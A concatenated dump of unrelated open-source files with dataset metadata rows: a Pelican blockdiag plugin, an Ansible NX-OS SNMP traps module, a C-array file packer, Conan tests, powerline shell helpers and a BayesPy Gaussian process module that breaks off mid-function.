        cmd = ShowExt(MyApp(sys.stdout), None)
        args = [self.test_id]
        ext_alias = self.test_id
        self._test_show_resource(resource, cmd, ext_alias, args, fields=[])
| apache-2.0 | -5,203,050,540,671,098,000 | 40.595745 | 78 | 0.66445 | false |
xsteadfastx/pelican-plugins | liquid_tags/diag.py | 25 | 4100 | """
Blockdiag Tag
---------
This tag implements a liquid style tag for blockdiag [1]. You can use different
diagram types like blockdiag, seqdiag, packetdiag etc. [1]
[1] http://blockdiag.com/en/blockdiag/
Syntax
------
{% blockdiag {
<diagramm type> {
<CODE>
}
}
%}
Examples
--------
{% blockdiag {
blockdiag {
A -> B -> C;
B -> D;
}
}
%}
{% blockdiag {
actdiag {
A -> B -> C -> D -> E;
lane {
A; C; E;
}
lane {
B; D;
}
}
}
%}
{% blockdiag {
packetdiag {
0-7: Source Port
8-15: Destination Port
16-31: Sequence Number
32-47: Acknowledgment Number
}
}
%}
...
Output
------
<span class="blockdiag" style="align: center;"><img src="data:image/png;base64,_BASE64_IMAGE DATA_/></span>
"""
import io
import os
import sys
import base64
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = '{% blockdiag [diagram type] [code] %}'
DOT_BLOCK_RE = re.compile(r'^\s*(?P<diagram>\w+).*$', re.MULTILINE | re.DOTALL)
_draw_mode = 'PNG'
_publish_mode = 'PNG'
def get_diag(code, command):
""" Generate diagramm and return data """
import tempfile
import shutil
code = code + u'\n'
try:
tmpdir = tempfile.mkdtemp()
fd, diag_name = tempfile.mkstemp(dir=tmpdir)
f = os.fdopen(fd, "w")
f.write(code.encode('utf-8'))
f.close()
format = _draw_mode.lower()
draw_name = diag_name + '.' + format
saved_argv = sys.argv
argv = [diag_name, '-T', format, '-o', draw_name]
if _draw_mode == 'SVG':
argv += ['--ignore-pil']
# Run command
command.main(argv)
# Read image data from file
file_name = diag_name + '.' + _publish_mode.lower()
with io.open(file_name, 'rb') as f:
data = f.read()
f.close()
finally:
for file in os.listdir(tmpdir):
os.unlink(tmpdir + "/" + file)
# os.rmdir will fail -> use shutil
shutil.rmtree(tmpdir)
return data
def diag(code, command):
if command == "blockdiag": # blockdiag
import blockdiag.command
return get_diag(code, blockdiag.command)
elif command == "diagram": # diagram
import blockdiag.command
return get_diag(code, blockdiag.command)
elif command == "seqdiag": # seqdiag
import seqdiag.command
return get_diag(code, seqdiag.command)
elif command == "actdiag": # actdiag
import actdiag.command
return get_diag(code, actdiag.command)
elif command == "nwdiag": # nwdiag
import nwdiag.command
return get_diag(code, nwdiag.command)
elif command == "packetdiag": # packetdiag
import packetdiag.command
return get_diag(code, packetdiag.command)
elif command == "rackdiag": # racketdiag
import rackdiag.command
return get_diag(code, rackdiag.command)
else: # not found
print("No such command %s" % command)
return None
@LiquidTags.register("blockdiag")
def blockdiag_parser(preprocessor, tag, markup):
""" Blockdiag parser """
m = DOT_BLOCK_RE.search(markup)
if m:
# Get diagram type and code
diagram = m.group('diagram').strip()
code = markup
# Run command
output = diag(code, diagram)
if output:
# Return Base64 encoded image
return '<span class="blockdiag" style="align: center;"><img src="data:image/png;base64,%s"></span>' % base64.b64encode(output)
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# This import allows image tag to be a Pelican plugin
from .liquid_tags import register
| agpl-3.0 | -5,766,266,376,528,250,000 | 22.163842 | 138 | 0.532927 | false |
Yannig/ansible | lib/ansible/modules/network/nxos/nxos_snmp_traps.py | 8 | 7300 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_traps
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP traps.
description:
    - Manages SNMP traps configurations.
author:
    - Jason Edelman (@jedelman8)
notes:
    - Tested against NXOSv 7.3.(0)D1(1) on VIRL
    - This module works at the group level for traps. If you need to only
      enable/disable 1 specific trap within a group, use the M(nxos_command)
      module.
    - Be aware that you can set a trap only for an enabled feature.
options:
    group:
        description:
            - Case sensitive group.
        required: true
        choices: ['aaa', 'bridge', 'callhome', 'cfs', 'config', 'entity',
            'feature-control', 'hsrp', 'license', 'link', 'lldp', 'ospf', 'pim',
            'rf', 'rmon', 'snmp', 'storm-control', 'stpx', 'sysmgr', 'system',
            'upgrade', 'vtp', 'all']
    state:
        description:
            - Manage the state of the resource.
        required: false
        default: enabled
        choices: ['enabled','disabled']
'''

EXAMPLES = '''
# ensure lldp trap configured
- nxos_snmp_traps:
    group: lldp
    state: enabled

# ensure lldp trap is not configured
- nxos_snmp_traps:
    group: lldp
    state: disabled
'''

RETURN = '''
commands:
    description: command sent to the device
    returned: always
    type: list
    sample: "snmp-server enable traps lldp ;"
'''
from ansible.module_utils.nxos import load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
command = {
'command': command,
'output': 'json',
}
return run_commands(module, command)
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_snmp_traps(group, module):
body = execute_show_command('show snmp trap', module)
trap_key = {
'description': 'trap',
'isEnabled': 'enabled'
}
resource = {}
try:
resource_table = body[0]['TABLE_snmp_trap']['ROW_snmp_trap']
for each_feature in ['aaa', 'bridge', 'callhome', 'cfs', 'config',
'entity', 'feature-control', 'hsrp', 'license',
'link', 'lldp', 'ospf', 'pim', 'rf', 'rmon',
'snmp', 'storm-control', 'stpx', 'sysmgr',
'system', 'upgrade', 'vtp']:
resource[each_feature] = []
for each_resource in resource_table:
key = str(each_resource['trap_type'])
mapped_trap = apply_key_map(trap_key, each_resource)
if key != 'Generic':
resource[key].append(mapped_trap)
except (KeyError, AttributeError):
return resource
find = resource.get(group, None)
if group == 'all'.lower():
return resource
elif find:
trap_resource = {group: resource[group]}
return trap_resource
else:
# if 'find' is None, it means that 'group' is a
# currently disabled feature.
return {}
def get_trap_commands(group, state, existing, module):
commands = []
enabled = False
disabled = False
if group == 'all':
if state == 'disabled':
for feature in existing:
trap_commands = ['no snmp-server enable traps {0}'.format(feature) for
trap in existing[feature] if trap['enabled'] == 'Yes']
trap_commands = list(set(trap_commands))
commands.append(trap_commands)
elif state == 'enabled':
for feature in existing:
trap_commands = ['snmp-server enable traps {0}'.format(feature) for
trap in existing[feature] if trap['enabled'] == 'No']
trap_commands = list(set(trap_commands))
commands.append(trap_commands)
else:
if group in existing:
for each_trap in existing[group]:
check = each_trap['enabled']
if check.lower() == 'yes':
enabled = True
if check.lower() == 'no':
disabled = True
if state == 'disabled' and enabled:
commands.append(['no snmp-server enable traps {0}'.format(group)])
elif state == 'enabled' and disabled:
commands.append(['snmp-server enable traps {0}'.format(group)])
else:
module.fail_json(msg='{0} is not a currently '
'enabled feature.'.format(group))
return commands
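# For example (illustrative): with group='lldp', state='disabled' and the lldp
# trap currently enabled on the device, this returns
# [['no snmp-server enable traps lldp']].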
def main():
argument_spec = dict(
state=dict(choices=['enabled', 'disabled'], default='enabled'),
group=dict(choices=['aaa', 'bridge', 'callhome', 'cfs', 'config',
'entity', 'feature-control', 'hsrp',
'license', 'link', 'lldp', 'ospf', 'pim', 'rf',
'rmon', 'snmp', 'storm-control', 'stpx',
'sysmgr', 'system', 'upgrade', 'vtp', 'all'],
required=True),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
results = {'changed': False, 'commands': [], 'warnings': warnings}
group = module.params['group'].lower()
state = module.params['state']
existing = get_snmp_traps(group, module)
commands = get_trap_commands(group, state, existing, module)
cmds = flatten_list(commands)
if cmds:
results['changed'] = True
if not module.check_mode:
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
results['commands'] = cmds
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,581,111,262,623,944,000 | 29.543933 | 87 | 0.571507 | false |
TakefiveInteractive/TedkOS | gui/cArrFile.py | 1 | 1145 | #!/usr/bin/python2.7
import sys
import struct
'''
magic ("\x01carray\x01file\x01")
numOfObjs (uint32_t)
For each obj:
length (uint32_t) (length = 0 <=> padding)
obj
0x55 0xaa
'''
magic = "\x01carray\x01file\x01"
# elements in List will be converted to bytearray.
def makeCArray(inputList):
    ans = bytearray(magic)
    objList = [bytearray(x) for x in inputList]
    ans += struct.pack('<I', len(objList))
    for obj in objList:
        ans += struct.pack('<I', len(obj))
        ans += obj
    ans += bytearray(b'\x55')
    ans += bytearray(b'\xAA')
    return ans
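# A matching reader is not part of this script; the sketch below is only an
# illustration of the layout documented above (magic, count, then
# length-prefixed objects, terminated by 0x55 0xAA).
def readCArray(data):
    assert data[:len(magic)] == magic
    offset = len(magic)
    (count,) = struct.unpack_from('<I', data, offset)
    offset += 4
    objs = []
    for _ in range(count):
        (length,) = struct.unpack_from('<I', data, offset)
        offset += 4
        objs.append(data[offset:offset + length])
        offset += length
    assert data[offset:offset + 2] == bytearray(b'\x55\xaa')
    return objs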
if __name__ == "__main__":
    if len(sys.argv) == 1:
        print
        print "Usage: " + sys.argv[0] + " [output] [front_padding] (input0) (input1) ..."
        print " If any input = '-', it represents a padding"
        print
        sys.exit(-1)

    outName = sys.argv[1]
    front_padding = int(sys.argv[2])
    inNames = sys.argv[3:]

    inObjects = [bytearray()] * front_padding
    for name in inNames:
        if name == '-':
            inObjects += [bytearray()]
        else:
            f = open(name, 'rb')
            inObjects += [f.read()]
            f.close()

    ans = makeCArray(inObjects)

    outFile = open(outName, 'wb+')
    outFile.write(ans)
    outFile.close()
 | mit | -5,790,802,003,291,314,000 | 19.836364 | 83 | 0.624454 | false |
luckielordie/conan | conans/test/remove_subsetting_test.py | 2 | 5370 | import unittest
from conans.test.utils.tools import TestClient
from conans.util.files import mkdir
import os
class RemoveSubsettingTest(unittest.TestCase):
def remove_options_test(self):
# https://github.com/conan-io/conan/issues/2327
# https://github.com/conan-io/conan/issues/2781
client = TestClient()
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
options = {"opt1": [True, False], "opt2": [True, False]}
default_options = "opt1=True", "opt2=False"
def config_options(self):
del self.options.opt2
def build(self):
assert "opt2" not in self.options
self.options.opt2
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run("install ..")
error = client.run("build ..", ignore_error=True)
self.assertTrue(error)
self.assertIn("ConanException: 'options.opt2' doesn't exist", client.out)
self.assertIn("Possible options are ['opt1']", client.out)
def remove_setting_test(self):
# https://github.com/conan-io/conan/issues/2327
client = TestClient()
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
settings = "os", "build_type"
def configure(self):
del self.settings.build_type
def source(self):
self.settings.build_type
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run("source ..") # Without install you can access build_type, no one has removed it
client.run("install ..")
# This raised an error because build_type wasn't defined
client.run("build ..")
error = client.run("source ..", ignore_error=True)
self.assertTrue(error)
self.assertIn("'settings.build_type' doesn't exist", client.user_io.out)
def remove_runtime_test(self):
# https://github.com/conan-io/conan/issues/2327
client = TestClient()
conanfile = """from conans import ConanFile, CMake
class Pkg(ConanFile):
settings = "os", "compiler", "arch"
def configure(self):
del self.settings.compiler.runtime
def build(self):
try:
self.settings.compiler.runtime
except Exception as e:
self.output.info(str(e))
cmake = CMake(self)
self.output.info(cmake.command_line)
"""
client.save({"conanfile.py": conanfile})
build_folder = os.path.join(client.current_folder, "build")
mkdir(build_folder)
client.current_folder = build_folder
client.run('install .. -s os=Windows -s compiler="Visual Studio" -s compiler.version=15 -s arch=x86')
# This raised an error because build_type wasn't defined
client.run("build ..")
self.assertIn("'settings.compiler.runtime' doesn't exist for 'Visual Studio'", client.out)
self.assertNotIn("CONAN_LINK_RUNTIME", client.out)
self.assertIn('-DCONAN_COMPILER="Visual Studio"', client.out)
def remove_subsetting_test(self):
# https://github.com/conan-io/conan/issues/2049
client = TestClient()
base = '''from conans import ConanFile
class ConanLib(ConanFile):
name = "lib"
version = "0.1"
'''
test = """from conans import ConanFile, CMake
class ConanLib(ConanFile):
settings = "compiler", "arch"
def configure(self):
del self.settings.compiler.libcxx
def test(self):
pass
def build(self):
cmake = CMake(self)
self.output.info("TEST " + cmake.command_line)
"""
client.save({"conanfile.py": base,
"test_package/conanfile.py": test})
client.run("create . user/testing -s arch=x86_64 -s compiler=gcc "
"-s compiler.version=4.9 -s compiler.libcxx=libstdc++11")
self.assertNotIn("LIBCXX", client.out)
def remove_subsetting_build_test(self):
# https://github.com/conan-io/conan/issues/2049
client = TestClient()
conanfile = """from conans import ConanFile, CMake
class ConanLib(ConanFile):
settings = "compiler", "arch"
def package(self):
try:
self.settings.compiler.libcxx
except Exception as e:
self.output.error("PACKAGE " + str(e))
def configure(self):
del self.settings.compiler.libcxx
def build(self):
try:
self.settings.compiler.libcxx
except Exception as e:
self.output.error("BUILD " + str(e))
cmake = CMake(self)
self.output.info("BUILD " + cmake.command_line)
"""
client.save({"conanfile.py": conanfile})
client.run("install . -s arch=x86_64 -s compiler=gcc -s compiler.version=4.9 "
"-s compiler.libcxx=libstdc++11")
client.run("build .")
self.assertIn("ERROR: BUILD 'settings.compiler.libcxx' doesn't exist for 'gcc'",
client.out)
self.assertNotIn("LIBCXX", client.out)
client.run("package .")
self.assertIn("ERROR: PACKAGE 'settings.compiler.libcxx' doesn't exist for 'gcc'",
client.out)
| mit | 7,556,191,679,822,019,000 | 35.530612 | 109 | 0.618063 | false |
zeroc0d3/docker-lab | ruby/rootfs/usr/lib/python2.7/dist-packages/powerline/lib/shell.py | 16 | 4164 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from subprocess import Popen, PIPE
from functools import partial
from powerline.lib.encoding import get_preferred_input_encoding, get_preferred_output_encoding
if sys.platform.startswith('win32'):
# Prevent windows from launching consoles when calling commands
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms684863(v=vs.85).aspx
Popen = partial(Popen, creationflags=0x08000000)
def run_cmd(pl, cmd, stdin=None, strip=True):
'''Run command and return its stdout, stripped
If running command fails returns None and logs failure to ``pl`` argument.
:param PowerlineLogger pl:
Logger used to log failures.
:param list cmd:
Command which will be run.
:param str stdin:
String passed to command. May be None.
:param bool strip:
True if the result should be stripped.
'''
try:
p = Popen(cmd, shell=False, stdout=PIPE, stdin=PIPE)
except OSError as e:
pl.exception('Could not execute command ({0}): {1}', e, cmd)
return None
else:
stdout, err = p.communicate(
stdin if stdin is None else stdin.encode(get_preferred_output_encoding()))
stdout = stdout.decode(get_preferred_input_encoding())
return stdout.strip() if strip else stdout
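# For example (illustrative): run_cmd(pl, ['uname', '-r']) returns the kernel
# release string, or None if the command could not be executed.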
def asrun(pl, ascript):
'''Run the given AppleScript and return the standard output and error.'''
return run_cmd(pl, ['osascript', '-'], ascript)
def readlines(cmd, cwd):
'''Run command and read its output, line by line
:param list cmd:
Command which will be run.
:param str cwd:
Working directory of the command which will be run.
'''
p = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE, cwd=cwd)
encoding = get_preferred_input_encoding()
p.stderr.close()
with p.stdout:
for line in p.stdout:
yield line[:-1].decode(encoding)
try:
from shutil import which
except ImportError:
# shutil.which was added in python-3.3. Here is what was added:
# Lib/shutil.py, commit 5abe28a9c8fe701ba19b1db5190863384e96c798
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
'''Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
``mode`` defaults to os.F_OK | os.X_OK. ``path`` defaults to the result
of ``os.environ.get('PATH')``, or can be overridden with a custom search
path.
'''
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (
os.path.exists(fn)
and os.access(fn, mode)
and not os.path.isdir(fn)
)
# If we’re given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get('PATH', os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == 'win32':
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get('PATHEXT', '').split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given 'python.exe'.
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don’t have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
| mit | 3,810,917,127,208,223,000 | 30.278195 | 94 | 0.703125 | false |
jluttine/bayespy | bayespy/inference/vmp/nodes/gp.py | 4 | 23431 | ################################################################################
# Copyright (C) 2011-2012 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
import itertools
import numpy as np
import scipy as sp
import scipy.linalg.decomp_cholesky as decomp
import scipy.linalg as linalg
import scipy.special as special
import matplotlib.pyplot as plt
import time
import profile
import scipy.spatial.distance as distance
from .node import Node
from .stochastic import Stochastic
from bayespy.utils.misc import *
# Computes log probability density function of the Gaussian
# distribution
def gaussian_logpdf(y_invcov_y,
y_invcov_mu,
mu_invcov_mu,
logdetcov,
D):
return (-0.5*D*np.log(2*np.pi)
-0.5*logdetcov
-0.5*y_invcov_y
+y_invcov_mu
-0.5*mu_invcov_mu)
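# The expression above is the Gaussian log-density with the quadratic form
# expanded,
#   log N(y; mu, Cov) = -D/2 log(2 pi) - 1/2 log|Cov|
#                       - 1/2 y'inv(Cov)y + y'inv(Cov)mu - 1/2 mu'inv(Cov)mu,
# so the caller passes the three (pre-computed) quadratic terms directly.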
# m prior mean function
# k prior covariance function
# x data inputs
# z processed data outputs (z = inv(Cov) * (y-m(x)))
# U data covariance Cholesky factor
def gp_posterior_moment_function(m, k, x, y, noise=None):
# Prior
mu = m(x)[0]
K = k(x,x)[0]
if noise != None:
K += noise
#print('hereiamagain')
#print(K)
# Compute posterior GP
N = len(y)
if N == 0:
U = None
z = None
else:
U = chol(K)
z = chol_solve(U, y-mu)
def get_moments(xh, covariance=1, mean=True):
(kh,) = k(x, xh)
# Function for computing posterior moments
if mean:
# Mean vector
mh = m(xh)
if z != None:
mh += np.dot(kh.T, z)
else:
mh = None
if covariance:
if covariance == 1:
# Variance vector
khh = k(xh)
if U != None:
khh -= np.einsum('i...,i...', kh, chol_solve(U, kh))
elif covariance == 2:
# Full covariance matrix
khh = k(xh,xh)
if U != None:
khh -= np.dot(kh.T, chol_solve(U,kh))
else:
khh = None
return [mh, khh]
return get_moments
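# The moments computed above are the standard GP posterior
#   mean(xh) = m(xh) + k(xh, x) K^{-1} (y - m(x))
#   cov(xh)  = k(xh, xh) - k(xh, x) K^{-1} k(x, xh)
# with K = k(x, x) (+ noise), evaluated through the Cholesky factor U.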
# m prior mean function
# k prior covariance function
# x data inputs
# z processed data outputs (z = inv(Cov) * (y-m(x)))
# U data covariance Cholesky factor
## def gp_multi_posterior_moment_function(m, k, x, y, noise=None):
## # Prior
## mu = m(x)[0]
## K = k(x,x)[0]
## if noise != None:
## K += noise
## #print('hereiamagain')
## #print(K)
## # Compute posterior GP
## N = len(y)
## if N == 0:
## U = None
## z = None
## else:
## U = chol(K)
## z = chol_solve(U, y-mu)
## def get_moments(xh, covariance=1, mean=True):
## (kh,) = k(x, xh)
## # Function for computing posterior moments
## if mean:
## # Mean vector
## mh = m(xh)
## if z != None:
## mh += np.dot(kh.T, z)
## else:
## mh = None
## if covariance:
## if covariance == 1:
## # Variance vector
## khh = k(xh)
## if U != None:
## khh -= np.einsum('i...,i...', kh, chol_solve(U, kh))
## elif covariance == 2:
## # Full covariance matrix
## khh = k(xh,xh)
## if U != None:
## khh -= np.dot(kh.T, chol_solve(U,kh))
## else:
## khh = None
## return [mh, khh]
## return get_moments
def gp_cov_se(D2, overwrite=False):
if overwrite:
K = D2
K *= -0.5
np.exp(K, out=K)
else:
K = np.exp(-0.5*D2)
return K
def gp_cov_delta(N):
return np.identity(N)
def squared_distance(x1, x2):
# Reshape arrays to 2-D arrays
sh1 = np.shape(x1)[:-1]
sh2 = np.shape(x2)[:-1]
d = np.shape(x1)[-1]
x1 = np.reshape(x1, (-1,d))
x2 = np.reshape(x2, (-1,d))
# Compute squared Euclidean distance
D2 = distance.cdist(x1, x2, metric='sqeuclidean')
# Reshape the result
D2 = np.reshape(D2, sh1 + sh2)
return D2
# General rule for the parameters for covariance functions:
#
# (value, [ [dvalue1, ...], [dvalue2, ...], [dvalue3, ...], ...])
#
# For instance,
#
# k = covfunc_se((1.0, []), (15, [ [1,update_grad] ]))
# K = k((x1, [ [dx1,update_grad] ]), (x2, []))
#
# Plain values are converted as:
# value -> (value, [])
def gp_standardize_input(x):
if np.ndim(x) == 0:
x = add_trailing_axes(x, 2)
elif np.ndim(x) == 1:
x = add_trailing_axes(x, 1)
return x
def gp_preprocess_inputs(*args):
args = list(args)
if len(args) < 1 or len(args) > 2:
raise Exception("Number of inputs must be one or two")
if len(args) == 2:
if args[0] is args[1]:
args[0] = gp_standardize_input(args[0])
args[1] = args[0]
else:
args[1] = gp_standardize_input(args[1])
args[0] = gp_standardize_input(args[0])
else:
args[0] = gp_standardize_input(args[0])
return args
def covfunc_delta(theta, *inputs, gradient=False):
amplitude = theta[0]
if gradient:
gradient_amplitude = gradient[0]
else:
gradient_amplitude = []
inputs = gp_preprocess_inputs(*inputs)
# Compute distance and covariance matrix
if len(inputs) == 1:
# Only variance vector asked
x = inputs[0]
K = np.ones(np.shape(x)[:-1]) * amplitude**2
else:
# Full covariance matrix asked
x1 = inputs[0]
x2 = inputs[1]
# Number of inputs x1
N1 = np.shape(x1)[-2]
# x1 == x2?
if x1 is x2:
delta = True
# Delta covariance
K = gp_cov_delta(N1) * amplitude**2
else:
delta = False
# Number of inputs x2
N2 = np.shape(x2)[-2]
# Zero covariance
K = np.zeros((N1,N2))
# Gradient w.r.t. amplitude
if gradient:
for ind in range(len(gradient_amplitude)):
gradient_amplitude[ind] = K * (2 * gradient_amplitude[ind] / amplitude)
if gradient:
return (K, gradient)
else:
return K
def covfunc_se(theta, *inputs, gradient=False):
amplitude = theta[0]
lengthscale = theta[1]
## print('in se')
## print(amplitude)
## print(lengthscale)
if gradient:
gradient_amplitude = gradient[0]
gradient_lengthscale = gradient[1]
else:
gradient_amplitude = []
gradient_lengthscale = []
inputs = gp_preprocess_inputs(*inputs)
# Compute covariance matrix
if len(inputs) == 1:
x = inputs[0]
# Compute variance vector
K = np.ones(np.shape(x)[:-1])
K *= amplitude**2
# Compute gradient w.r.t. lengthscale
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] = np.zeros(np.shape(x)[:-1])
else:
x1 = inputs[0] / (lengthscale)
x2 = inputs[1] / (lengthscale)
# Compute distance matrix
K = squared_distance(x1, x2)
# Compute gradient partly
if gradient:
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] = K * ((lengthscale**-1) * gradient_lengthscale[ind])
# Compute covariance matrix
gp_cov_se(K, overwrite=True)
K *= amplitude**2
# Compute gradient w.r.t. lengthscale
if gradient:
for ind in range(len(gradient_lengthscale)):
gradient_lengthscale[ind] *= K
# Gradient w.r.t. amplitude
if gradient:
for ind in range(len(gradient_amplitude)):
gradient_amplitude[ind] = K * (2 * gradient_amplitude[ind] / amplitude)
# Return values
if gradient:
return (K, gradient)
else:
return K
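# Illustrative call (hypothetical parameter values): covfunc_se((2.0, 1.5), x1, x2)
# returns K with K[i, j] = 2.0**2 * exp(-0.5 * ||x1_i - x2_j||**2 / 1.5**2);
# passing a two-element `gradient` list (one sub-list per parameter) also
# fills in the derivative messages w.r.t. amplitude and lengthscale.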
class NodeCovarianceFunction(Node):
def __init__(self, covfunc, *args, **kwargs):
self.covfunc = covfunc
params = list(args)
for i in range(len(args)):
# Check constant parameters
if is_numeric(args[i]):
params[i] = NodeConstant([np.asanyarray(args[i])],
dims=[np.shape(args[i])])
# TODO: Parameters could be constant functions? :)
Node.__init__(self, *params, dims=[(np.inf, np.inf)], **kwargs)
def message_to_child(self, gradient=False):
params = [parent.message_to_child(gradient=gradient) for parent in self.parents]
return self.covariance_function(*params)
def covariance_function(self, *params):
params = list(params)
gradient_params = list()
for ind in range(len(params)):
if isinstance(params[ind], tuple):
gradient_params.append(params[ind][1])
params[ind] = params[ind][0][0]
else:
gradient_params.append([])
params[ind] = params[ind][0]
def cov(*inputs, gradient=False):
if gradient:
grads = [[grad[0] for grad in gradient_params[ind]]
for ind in range(len(gradient_params))]
(K, dK) = self.covfunc(params,
*inputs,
gradient=grads)
for ind in range(len(dK)):
for (grad, dk) in zip(gradient_params[ind], dK[ind]):
grad[0] = dk
K = [K]
dK = []
for grad in gradient_params:
dK += grad
return (K, dK)
else:
K = self.covfunc(params,
*inputs,
gradient=False)
return [K]
return cov
class NodeCovarianceFunctionSum(NodeCovarianceFunction):
def __init__(self, *args, **kwargs):
NodeCovarianceFunction.__init__(self,
None,
*args,
**kwargs)
def covariance_function(self, *covfuncs):
def cov(*inputs, gradient=False):
K_sum = 0
if gradient:
dK_sum = list()
for k in covfuncs:
if gradient:
(K, dK) = k(*inputs, gradient=gradient)
dK_sum += dK
else:
K = k(*inputs, gradient=gradient)
K_sum += K[0]
if gradient:
return ([K_sum], dK_sum)
else:
return [K_sum]
return cov
class NodeCovarianceFunctionDelta(NodeCovarianceFunction):
def __init__(self, amplitude, **kwargs):
NodeCovarianceFunction.__init__(self,
covfunc_delta,
amplitude,
**kwargs)
class NodeCovarianceFunctionSquaredExponential(NodeCovarianceFunction):
def __init__(self, amplitude, lengthscale, **kwargs):
NodeCovarianceFunction.__init__(self,
covfunc_se,
amplitude,
lengthscale,
**kwargs)
class NodeMultiCovarianceFunction(NodeCovarianceFunction):
def __init__(self, *args, **kwargs):
NodeCovarianceFunction.__init__(self,
None,
*args,
**kwargs)
def covfunc(self, *covfuncs):
def cov(*inputs, gradient=False):
K_sum = 0
if gradient:
dK_sum = list()
for k in covfuncs:
if gradient:
(K, dK) = k(*inputs, gradient=gradient)
dK_sum += dK
else:
K = k(*inputs, gradient=gradient)
K_sum += K[0]
if gradient:
return ([K_sum], dK_sum)
else:
return [K_sum]
return cov
class NodeConstantGaussianProcess(Node):
def __init__(self, f, **kwargs):
self.f = f
Node.__init__(self, dims=[(np.inf,)], **kwargs)
def message_to_child(self, gradient=False):
# Wrapper
def func(x, gradient=False):
if gradient:
return ([self.f(x)], [])
else:
return [self.f(x)]
return func
# At least for now, simplify this GP node such that a GP is either
# observed or latent. If it is observed, it doesn't take messages from
# children, actually, it should not even have children!
#class NodeMultiGaussianProcess(NodeVariable):
class NodeMultiGaussianProcess(Stochastic):
def __init__(self, m, k, **kwargs):
self.x = []
self.f = []
# By default, posterior == prior
self.m = m
self.k = k
# Ignore plates
NodeVariable.__init__(self,
m,
k,
plates=(),
dims=[(np.inf,), (np.inf,np.inf)],
**kwargs)
def message_to_parent(self, index):
if index == 0:
k = self.parents[1].message_to_child()[0]
K = k(self.x, self.x)
return [self.x,
self.mu,
K]
if index == 1:
raise Exception("not implemented yet")
def message_to_child(self):
if self.observed:
raise Exception("Observable GP should not have children.")
return self.u
def get_parameters(self):
return self.u
def observe(self, x, f):
if np.ndim(x) == 1:
if np.shape(f) != np.shape(x):
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
elif np.shape(f) != np.shape(x)[:-1]:
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
self.observed = True
self.x = x
self.f = f
## self.x_obs = x
## self.f_obs = f
# You might want:
# - mean for x
# - covariance (and mean) for x
# - variance (and mean) for x
# - i.e., mean and/or (co)variance for x
# - covariance for x1 and x2
def lower_bound_contribution(self, gradient=False):
m = self.parents[0].message_to_child(gradient=gradient)
k = self.parents[1].message_to_child(gradient=gradient)
## m = self.parents[0].message_to_child(gradient=gradient)[0]
## k = self.parents[1].message_to_child(gradient=gradient)[0]
# Prior
if gradient:
(mu, dmus) = m(self.x, gradient=True)
(K, dKs) = k(self.x, self.x, gradient=True)
else:
mu = m(self.x)
K = k(self.x, self.x)
dmus = []
dKs = []
mu = mu[0]
K = K[0]
# Log pdf
if self.observed:
# Vector of f-mu
f0 = np.vstack([(f-m) for (f,m) in zip(self.f,mu)])
# Full covariance matrix
K_full = np.bmat(K)
try:
U = chol(K_full)
except linalg.LinAlgError:
print('non positive definite, return -inf')
return -np.inf
z = chol_solve(U, f0)
#print(K)
L = gaussian_logpdf(np.dot(f0, z),
0,
0,
